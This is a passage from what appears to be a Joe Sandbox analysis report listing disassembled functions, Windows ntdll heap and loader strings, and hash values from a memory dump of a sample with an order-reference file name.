                                                                                            Function 019129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0191327D
                                                                                            • HEAP[%wZ]: , xrefs: 01913255
                                                                                            • HEAP: , xrefs: 01913264
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                            • API String ID: 0-617086771
                                                                                            • Opcode ID: 42fcae779c30e8acac3c5f786d8372fd1ff8e8970bfb2f2ffc4b1eb00b6c5e40
                                                                                            • Instruction ID: c1a2a006b3fb2cb9b3b7cfc771afe091da632a7396491f7651f0a22be8eb97c2
                                                                                            • Opcode Fuzzy Hash: 42fcae779c30e8acac3c5f786d8372fd1ff8e8970bfb2f2ffc4b1eb00b6c5e40
                                                                                            • Instruction Fuzzy Hash: 1D92CF71E042499FEB25CF68C440BAEBBF5FF49310F148459E94AAB395D334AA85CF50
                                                                                            Function 01910770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-4253913091
                                                                                            • Opcode ID: 4300efa36a32a254e1c936d985d6cf7d89ee224fd86c513947992b8332d7dc6c
                                                                                            • Instruction ID: 7c5492e7f9190cf4f718cd99da5b924e19a123b9112ee0fb05936202f95b7227
                                                                                            • Opcode Fuzzy Hash: 4300efa36a32a254e1c936d985d6cf7d89ee224fd86c513947992b8332d7dc6c
                                                                                            • Instruction Fuzzy Hash: 83F1AD3060060ADFEB15CF68C894F6AB7B9FF44700F1945A8E51A9B385D735E9C1CBA1
                                                                                            Function 01926962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $@
                                                                                            • API String ID: 0-1077428164
                                                                                            • Opcode ID: ce06b6ce3b01b5a1d5490509099de90b22e5a25b32b7b3c3d44d646a7d0444ef
                                                                                            • Instruction ID: dfe4ceb2774c8f88e033d060586ed3993078c96600e0c5f87fb12a1d3cc24d40
                                                                                            • Opcode Fuzzy Hash: ce06b6ce3b01b5a1d5490509099de90b22e5a25b32b7b3c3d44d646a7d0444ef
                                                                                            • Instruction Fuzzy Hash: A8C27E716083519FDB29CF68C880BABBBE9AF98714F04892DF9CD97245D734D844CB62
                                                                                            Function 018FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                            • API String ID: 0-2779062949
                                                                                            • Opcode ID: c199a5b053c069b8d4e8d1050229e0ddf0a9c39b8b11cd3ff96ad19e6af3309f
                                                                                            • Instruction ID: 89aecf0d21c1ae315dc66e32f107f0e7a7d2b85567ee6789b2e9aaef9d966008
                                                                                            • Opcode Fuzzy Hash: c199a5b053c069b8d4e8d1050229e0ddf0a9c39b8b11cd3ff96ad19e6af3309f
                                                                                            • Instruction Fuzzy Hash: 40A15A759016299BDB61DF28CC88BAABBB8EF44B10F1001E9EA0DA7250D7359F84CF50
                                                                                            Function 01920BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0196A121
                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0196A10F
                                                                                            • LdrpCheckModule, xrefs: 0196A117
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-161242083
                                                                                            • Opcode ID: 2d32661c580eb1edd8dbb6d6bae5a269901d8dd64ee14b33b4c19f563a68ee05
                                                                                            • Instruction ID: 51231e7893327daa55bc846a55caf6675558924adb5a2abddb4a4b0c312bdcd7
                                                                                            • Opcode Fuzzy Hash: 2d32661c580eb1edd8dbb6d6bae5a269901d8dd64ee14b33b4c19f563a68ee05
                                                                                            • Instruction Fuzzy Hash: CA71C2B4E00305EFDB25DF68C984AAEB7F8FB84304F19442DE50AE7255E734AA41CB51
                                                                                            Function 0193C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Failed to reallocate the system dirs string !, xrefs: 019782D7
                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 019782DE
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 019782E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-1783798831
                                                                                            • Opcode ID: 2a38cd90543a8e006dc571a16bc1fff56e1c58ee2027344f1ea944fd4623b82c
                                                                                            • Instruction ID: 8da3dff9ec01d618d5a9285d548f74adc5ca05bd9be0bfb429530a78e1c90c8f
                                                                                            • Opcode Fuzzy Hash: 2a38cd90543a8e006dc571a16bc1fff56e1c58ee2027344f1ea944fd4623b82c
                                                                                            • Instruction Fuzzy Hash: 6641DD71648305BBD722EB68D888B5B77E8AF84750F10492EF94DE3294EB74E900CB91
                                                                                            Function 019BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • PreferredUILanguages, xrefs: 019BC212
                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019BC1C5
                                                                                            • @, xrefs: 019BC1F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                            • API String ID: 0-2968386058
                                                                                            • Opcode ID: c2c3eb9fc51cc3306af0c5397c7d53d0040a28072a48cc48aaa3b395c5c89437
                                                                                            • Instruction ID: bc62388822c7d2b6b7cb8c7132f07c6858ae9d8f3e49c6b4ad0e238ab171c322
                                                                                            • Opcode Fuzzy Hash: c2c3eb9fc51cc3306af0c5397c7d53d0040a28072a48cc48aaa3b395c5c89437
                                                                                            • Instruction Fuzzy Hash: B0414171E0021AABEB11DBD8C991FEEBBBCAB54701F14416AEA0DF7240D774DA458B90
                                                                                            Function 01994144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                            • API String ID: 0-1373925480
                                                                                            • Opcode ID: fc48c51350c99dcbdfc0cf7d1d9b10875cf959c8bce173e50377b1d8997327d8
                                                                                            • Instruction ID: 4bc9eea09f505bbbb6e12d32e94c3faf67e621be9de8bd5af1747e73e7d495fd
                                                                                            • Opcode Fuzzy Hash: fc48c51350c99dcbdfc0cf7d1d9b10875cf959c8bce173e50377b1d8997327d8
                                                                                            • Instruction Fuzzy Hash: 5C411471A002488BEF27DBDDCA40BADBBB9FFA5340F14049AD909EB391D7358902CB50
                                                                                            Function 01984755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01984899
                                                                                            • LdrpCheckRedirection, xrefs: 0198488F
                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01984888
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 0-3154609507
                                                                                            • Opcode ID: 82ff3bfa02c95b9f11f06470a5c1fad15fffce70ba648ee94e3cec72cdbe6044
                                                                                            • Instruction ID: 7cd501b3b0762f0304f629324e669b203e2e3c28bb838e74ac4afd86d3597bc9
                                                                                            • Opcode Fuzzy Hash: 82ff3bfa02c95b9f11f06470a5c1fad15fffce70ba648ee94e3cec72cdbe6044
                                                                                            • Instruction Fuzzy Hash: 51418032A147529BCB21FE69D840F267BE8BF89A51F06056DED4DE7355E730E800CB92
                                                                                            Function 01910BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-2558761708
                                                                                            • Opcode ID: d584715e49c06d0481a972183371faf83fa45612c28de7c62ad8a1cbec7d8cfb
                                                                                            • Instruction ID: dcdbf0cbe566f03ea2fe428820f830ab5db7669c7fcc7a6696288a19bb2f0d72
                                                                                            • Opcode Fuzzy Hash: d584715e49c06d0481a972183371faf83fa45612c28de7c62ad8a1cbec7d8cfb
                                                                                            • Instruction Fuzzy Hash: E211CD313551069FEB29CA18C480F7AB3A9EF40B5AF1A859EF40ECB255DB34D8C1C761
                                                                                            Function 019820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01982104
                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 019820F3
                                                                                            • LdrpInitializationFailure, xrefs: 019820FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-2986994758
                                                                                            • Opcode ID: 9cbf2c0f2c37dbcae69bb3e0599854dfc558a3c42cda4942288625a0400eef7e
                                                                                            • Instruction ID: b0bcad6bcec4282bdb050da8bc1a965f12d662df01eed5cc3df8bea7fd4145a6
                                                                                            • Opcode Fuzzy Hash: 9cbf2c0f2c37dbcae69bb3e0599854dfc558a3c42cda4942288625a0400eef7e
                                                                                            • Instruction Fuzzy Hash: BEF0F675640308BBE724F74CCC46FA937ACFB81B58F60005DF708B7685D6B4AA44C691
                                                                                            Function 019103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: #%u
                                                                                            • API String ID: 48624451-232158463
                                                                                            • Opcode ID: ae91e2246492d0809045d5ecfc5e0ca1e74f565c66aeee1fa1c58af63e2a322e
                                                                                            • Instruction ID: 6e159f28ff9c1d39ba8741742a8e81808ea942027e466278ddf7d9e150b9981c
                                                                                            • Opcode Fuzzy Hash: ae91e2246492d0809045d5ecfc5e0ca1e74f565c66aeee1fa1c58af63e2a322e
                                                                                            • Instruction Fuzzy Hash: D1714A71A0014A9FDB01DFA8C990FAEBBF8BF58704F154065E909E7255EA34EE41CBA0
                                                                                            Function 0190A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • LdrResSearchResource Exit, xrefs: 0190AA25
                                                                                            • LdrResSearchResource Enter, xrefs: 0190AA13
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                            • API String ID: 0-4066393604
                                                                                            • Opcode ID: 1c8f42f73fb758d28130f9a97f24449550b187f5679ab7d23b47b34fb4c83728
                                                                                            • Instruction ID: 2822ff9ff8df114af5b7d17acf1392be6aa1513ad4d157c93d10f71dbac2f072
                                                                                            • Opcode Fuzzy Hash: 1c8f42f73fb758d28130f9a97f24449550b187f5679ab7d23b47b34fb4c83728
                                                                                            • Instruction Fuzzy Hash: B2E16071E00719EFEB22CB99C980BAEBBBEBF54311F104525E909E7291D7749941CBA0
                                                                                            Function 019CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `$`
                                                                                            • API String ID: 0-197956300
                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction ID: bae96fafdf9e4eaf53558c53f95b2640a052daa36447ea6c457bedc749088488
                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction Fuzzy Hash: C3C1C13120434A9BE725CF28C845B6BBBE5BFD4B19F084A2CF6DA87290E774D505CB42
                                                                                            Function 0197E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Legacy$UEFI
                                                                                            • API String ID: 2994545307-634100481
                                                                                            • Opcode ID: 62155b92c145ee90dc5e93cce2791ca3fea62a5f08e3a9ed4c3e78c3a1f49a26
                                                                                            • Instruction ID: d7486499c80c889fd2f811a06a2153895d49fc10c9cfdc9b44c88963e38375ae
                                                                                            • Opcode Fuzzy Hash: 62155b92c145ee90dc5e93cce2791ca3fea62a5f08e3a9ed4c3e78c3a1f49a26
                                                                                            • Instruction Fuzzy Hash: 92613A71E006199FDB25DFA8C884BAEBBB9FF48700F1444ADE649EB291D731A940CB51
                                                                                            Function 019A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$MUI
                                                                                            • API String ID: 0-17815947
                                                                                            • Opcode ID: d2dbfccaa40a0bfbc7758081c04eba11bc840e4f9f793b4111559e764e7fca69
                                                                                            • Instruction ID: d0dbb734394f0ec12670179fdc70f9fab659ae8fe012d2e861b4a6ea53508070
                                                                                            • Opcode Fuzzy Hash: d2dbfccaa40a0bfbc7758081c04eba11bc840e4f9f793b4111559e764e7fca69
                                                                                            • Instruction Fuzzy Hash: 08512971D0021DAFDB11DFA9CC80EEEBBBCFB44755F540529E619A7280D6709A09CBA0
                                                                                            Function 019004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • kLsE, xrefs: 01900540
                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0190063D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                            • API String ID: 0-2547482624
                                                                                            • Opcode ID: 00e6a15390c158c492838f1c9696497e2d25b99399b8983e1fbcf4efd556fab8
                                                                                            • Instruction ID: b282dd8f5b1c91ee22309a4369bfd3d4bd9fc46af276cbd68b02a661c742ef8b
                                                                                            • Opcode Fuzzy Hash: 00e6a15390c158c492838f1c9696497e2d25b99399b8983e1fbcf4efd556fab8
                                                                                            • Instruction Fuzzy Hash: FB51F0715047028FD726DF29C8407A7BBE9AF84345F18493EFA9E87281E730D545CB92
                                                                                            Function 0190A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0190A309
                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0190A2FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                            • API String ID: 0-2876891731
                                                                                            • Opcode ID: db0aba28924d2c4f0f174dc9d27e31f173e7a6cf75f924974ad43108b93175b8
                                                                                            • Instruction ID: 709c2e530dfbf1fe4cfd3772cfd40de6e445c34d8dfebba3a0e8f7d221a781ce
                                                                                            • Opcode Fuzzy Hash: db0aba28924d2c4f0f174dc9d27e31f173e7a6cf75f924974ad43108b93175b8
                                                                                            • Instruction Fuzzy Hash: 1141C130A04749DFDB16CF69C840B6D7BB8FF95711F144465E908DB291E7B5DA40CB90
                                                                                            Function 0193A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                            • API String ID: 2994545307-4008356553
                                                                                            • Opcode ID: 71921b2b506aec9fb93cd21aa5df0a9eb8a2426923e21ac8468ea1a677d02cf3
                                                                                            • Instruction ID: 7cf64cb832aa32b631c7b37fbfc4f87aafcc5b30078530aa0899722a9d010c6b
                                                                                            • Opcode Fuzzy Hash: 71921b2b506aec9fb93cd21aa5df0a9eb8a2426923e21ac8468ea1a677d02cf3
                                                                                            • Instruction Fuzzy Hash: 5301D1B2244704AFD311DF14DD45F1677E8E7C4719F018939A68CC71A0E338D904DB46
                                                                                            Function 0190C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: MUI
                                                                                            • API String ID: 0-1339004836
                                                                                            • Opcode ID: e89491dc31f33aa620c9ece974dd99dd5c18f3b8149be9224aadee5142564c85
                                                                                            • Instruction ID: 609d5487bcbe0e744b936b08028ed2da644fceeb245956c475722a56e1c51f87
                                                                                            • Opcode Fuzzy Hash: e89491dc31f33aa620c9ece974dd99dd5c18f3b8149be9224aadee5142564c85
                                                                                            • Instruction Fuzzy Hash: A9824E75E002199FEB26CFA9C880BEDBBB5BF44710F1481A9E95DAB391D7309D81CB50
                                                                                            Function 01986420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 5161ab1e0676b02404eb6c90599985ab3f4337868358030a432247b808d9a73e
                                                                                            • Instruction ID: bc4366df94a0eb326c37c6ce4b2d85869d64686b2446a6c81fb35fefcde33a41
                                                                                            • Opcode Fuzzy Hash: 5161ab1e0676b02404eb6c90599985ab3f4337868358030a432247b808d9a73e
                                                                                            • Instruction Fuzzy Hash: D2917371940219AFEB21EF95CD85FAEBBB8EF58B50F100065F608BB194D775AD04CBA0
                                                                                            Function 019AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 9dbccf1e1c1cb3ecf88dc8708462244b7417529711a63316a027a4026ed7d3b2
                                                                                            • Instruction ID: 9d0d4adb6f3a03ae48da23a2e4a2bca968b3d01c27f95b03e5ed97f7b8e3b7bf
                                                                                            • Opcode Fuzzy Hash: 9dbccf1e1c1cb3ecf88dc8708462244b7417529711a63316a027a4026ed7d3b2
                                                                                            • Instruction Fuzzy Hash: D8919131901509BFDB22EBA5DC44FEFBB79EF85750F500019F909A7250EB749949CB90
                                                                                            Function 0193A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GlobalTags
                                                                                            • API String ID: 0-1106856819
                                                                                            • Opcode ID: 66fa002ad5ea0ef525d2a08cdea5fc1f632b33af6966683436a5e428b39a3516
                                                                                            • Instruction ID: 9c28e28251b124fd81f119097ec4c00d3359935a1cfcf938b56ca7821c3f24bd
                                                                                            • Opcode Fuzzy Hash: 66fa002ad5ea0ef525d2a08cdea5fc1f632b33af6966683436a5e428b39a3516
                                                                                            • Instruction Fuzzy Hash: AE716CB5E0071A9FEF28CF9DC590AEDBBB5BF88741F14812EE509A7241E7319941CB50
                                                                                            Function 019A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .mui
                                                                                            • API String ID: 0-1199573805
                                                                                            • Opcode ID: 6775acf3dd7f91feae25464b5285caedd02eb3e094ef1097aa7f94d1849c8aba
                                                                                            • Instruction ID: 7729ce5f5261964e18c4996144bf30bf6c05fcc0724ea6425da35a85df7e3415
                                                                                            • Opcode Fuzzy Hash: 6775acf3dd7f91feae25464b5285caedd02eb3e094ef1097aa7f94d1849c8aba
                                                                                            • Instruction Fuzzy Hash: 5051A772D0022A9FDF11DF99D840AAEBBB8BF44710F494129EA19B7250D7B49D05CBE4
                                                                                            Function 0191E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: EXT-
                                                                                            • API String ID: 0-1948896318
                                                                                            • Opcode ID: 936d0fb7b49a24973e8f630845994c3647f612e92e79f1e306bd0e7c8ab85e6b
                                                                                            • Instruction ID: c76f9c2fc036b6e25c6af94f01c988dbc31a2b92341034bc7871b614a662363b
                                                                                            • Opcode Fuzzy Hash: 936d0fb7b49a24973e8f630845994c3647f612e92e79f1e306bd0e7c8ab85e6b
                                                                                            • Instruction Fuzzy Hash: 6741A17250830A9BE712DA75C940F6BBBECAFC8714F440D2DFA8CD7144E674DA848796
                                                                                            Function 0197C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
